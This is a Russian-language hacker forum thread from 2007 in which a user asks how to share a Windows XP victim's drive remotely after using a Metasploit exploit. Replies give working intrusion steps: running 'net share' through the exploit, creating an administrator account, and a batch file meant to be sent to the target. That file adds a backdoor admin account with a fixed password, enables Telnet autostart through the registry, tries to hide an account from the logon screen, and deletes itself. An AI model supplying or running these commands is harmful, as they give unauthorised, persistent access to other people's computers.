Win Xp как расшарить диск по сети?

Discussion in 'Безопасность и Анонимность' started by gov1541, 17 Dec 2007.

  1. gov1541

    gov1541 New Member

    Joined:
    17 Dec 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Пробовал metasploit 2.7 , говорит система вроде как пропатчена. Если там SP2, есть еще какие нибудь способы? Кстати, когда пользовался сплоитом делал так

    --> 192.168.0.1 - его IP
    --> winexec 'net share C:\\'
    все ли я правильно сделал?
    просто гдето видел при использовании этого сплоита как то устанавливают админские права, если так то подскажите как сделать?
     
  2. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    На что ты админские права хочешь поставить?
    Вопрос непонятный, а шара правильно...
    Если есть возможность выполнять удалённо команды - так флаг тебе в руки...
     
  3. KillAll

    KillAll Elder - Старейшина

    Joined:
    27 Feb 2006
    Messages:
    78
    Likes Received:
    10
    Reputations:
    0
    а дальше используй команду "net" для создания пользователя, для включения его в групу администраторов и сможешь под этим пользователем подключать любые диски, все через ту же команду "net"
     
  4. mad_xakep

    mad_xakep Banned

    Joined:
    10 Apr 2007
    Messages:
    190
    Likes Received:
    68
    Reputations:
    0
    кинь ему батник с таким содержанием
    net share shared$=c:\
     
  5. max_rebel

    max_rebel Elder - Старейшина

    Joined:
    18 Oct 2007
    Messages:
    460
    Likes Received:
    31
    Reputations:
    0
    net user hcr hcr /add
    net localgroup telnetclients /add
    net localgroup administrators hcr /add
    net localgroup telnetclients hcr /add
    set regadd=%windir%\system32\regadd.dll
    echo Windows Registry Editor Version 5.00>%regadd%
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]>>%regadd%
    echo "Start"=dword:00000002>>%regadd%
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%regadd%
    echo "Rad"="">>%regadd%
    regedit /s %regadd%
    :Cleaning
    del %regadd%
    del %0
    --------------------------------------------------------
    Сохрананяєш как *.bat файл и полный доступ к компу с
    user name: hcr
    pasword : hcr



    ^^^^^^^^^
    Это вот на хакzone нашёл -=)